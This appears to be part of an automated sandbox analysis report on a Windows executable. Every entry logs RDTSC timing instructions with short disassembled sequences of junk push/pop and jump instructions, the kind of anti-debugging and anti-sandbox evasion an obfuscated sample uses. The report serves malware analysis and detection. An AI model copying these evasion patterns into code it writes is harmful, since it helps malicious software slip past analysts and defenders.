                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC255 second address: BAC25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC25D second address: BAC276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A4h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59D99 second address: B59E2E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0704B35536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0704B35538h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F0704B35547h 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e mov edx, esi 0x00000030 popad 0x00000031 pop ecx 0x00000032 push 00000004h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F0704B35538h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov edx, dword ptr [ebp+122D392Bh] 0x00000054 nop 0x00000055 jng 00007F0704B35545h 0x0000005b jmp 00007F0704B3553Fh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 push edi 0x00000065 pop edi 0x00000066 pop ecx 0x00000067 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59E2E second address: B59E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC3FB second address: BAC421 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0704B35536h 0x00000008 jc 00007F0704B35536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F0704B35543h 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC570 second address: BAC57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC57B second address: BAC57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC57F second address: BAC583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC583 second address: BAC594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0704B35538h 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC594 second address: BAC59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BACFB8 second address: BACFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB1119 second address: BB111F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB07A2 second address: BB07C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0704B35536h 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c jmp 00007F0704B35543h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB07C3 second address: BB07F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0704B3A49Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F0704B3A4AFh 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB0ADC second address: BB0AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB0AE2 second address: BB0B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0704B3A4A5h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB0E67 second address: BB0E6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB0E6D second address: BB0E80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0704B3A49Eh 0x00000008 jc 00007F0704B3A496h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB0E80 second address: BB0E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB817E second address: BB8184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB8184 second address: BB8188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB641A second address: BB6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BB7F0C second address: BB7F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC14F7 second address: BC150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A4A4h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B207C8 second address: B207CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B207CC second address: B207EF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d je 00007F0704B3A496h 0x00000013 jmp 00007F0704B3A49Dh 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC0AE3 second address: BC0AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC0AE9 second address: BC0AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A49Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC0AFC second address: BC0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0704B3553Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC0C68 second address: BC0C74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC0C74 second address: BC0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC0C78 second address: BC0C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC10FD second address: BC1122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F0704B3553Eh 0x0000000b je 00007F0704B35536h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jg 00007F0704B3553Ch 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC724D second address: BC7257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7257 second address: BC725B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC725B second address: BC7280 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F0704B3A4ACh 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC73D6 second address: BC73E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3553Ah 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC73E4 second address: BC7401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC76A7 second address: BC76AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC76AD second address: BC76B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC76B6 second address: BC76BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC796D second address: BC7973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7973 second address: BC79A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0704B35545h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0704B35536h 0x00000014 jmp 00007F0704B3553Eh 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC79A5 second address: BC79A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7DFC second address: BC7E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F0704B35536h 0x00000011 jns 00007F0704B35536h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7E22 second address: BC7E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0704B3A4B3h 0x0000000c ja 00007F0704B3A496h 0x00000012 jmp 00007F0704B3A4A7h 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F0704B3A49Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0704B3A4A2h 0x00000025 jg 00007F0704B3A496h 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7E75 second address: BC7E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7FC7 second address: BC7FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7FCB second address: BC7FF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F0704B35536h 0x00000011 jmp 00007F0704B35544h 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BC7FF0 second address: BC8031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0704B3A4A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0704B3A4A5h 0x00000013 jmp 00007F0704B3A49Eh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BCB689 second address: BCB68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BCB68D second address: BCB699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0704B3A496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BD338B second address: BD338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BD2E0E second address: BD2E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BD2E14 second address: BD2E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0704B35536h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0704B35548h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BD2F7E second address: BD2F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BD30D7 second address: BD30DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE1029 second address: BE102F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE0BAE second address: BE0BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE0BB9 second address: BE0BD0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0704B3A4A2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE0BD0 second address: BE0BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE0BD6 second address: BE0C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F0704B3A4C1h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0704B3A4A7h 0x00000016 ja 00007F0704B3A496h 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE0C04 second address: BE0C0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE46A5 second address: BE46A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE46A9 second address: BE46C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE46C3 second address: BE46D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A49Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE46D4 second address: BE46D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE46D9 second address: BE46E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0704B3A496h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BE42A5 second address: BE42AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BEC185 second address: BEC18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BEC18B second address: BEC18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BEC18F second address: BEC198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BF5C14 second address: BF5C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BF5A59 second address: BF5A68 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0704B3A496h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BF5A68 second address: BF5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BF5A6F second address: BF5A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B3A49Eh 0x00000009 jne 00007F0704B3A496h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BFC477 second address: BFC498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0704B35536h 0x0000000a popad 0x0000000b push edx 0x0000000c jl 00007F0704B35549h 0x00000012 jmp 00007F0704B3553Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BFC6F0 second address: BFC709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BFC9B1 second address: BFC9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BFD5E8 second address: BFD648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F0704B3A496h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 ja 00007F0704B3A4A3h 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F0704B3A49Bh 0x00000021 jnp 00007F0704B3A4B1h 0x00000027 jng 00007F0704B3A496h 0x0000002d jmp 00007F0704B3A4A5h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0704B3A4A0h 0x00000039 jns 00007F0704B3A496h 0x0000003f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BFD648 second address: BFD64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C007D2 second address: C007E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A49Dh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C007E3 second address: C007E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C003D7 second address: C003DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C0A261 second address: C0A278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35542h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C11C71 second address: C11C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C11C75 second address: C11C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C11C79 second address: C11C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0704B3A49Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C11C90 second address: C11C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C20F13 second address: C20F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C20F17 second address: C20F27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0704B35536h 0x00000008 jg 00007F0704B35536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C20F27 second address: C20F2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
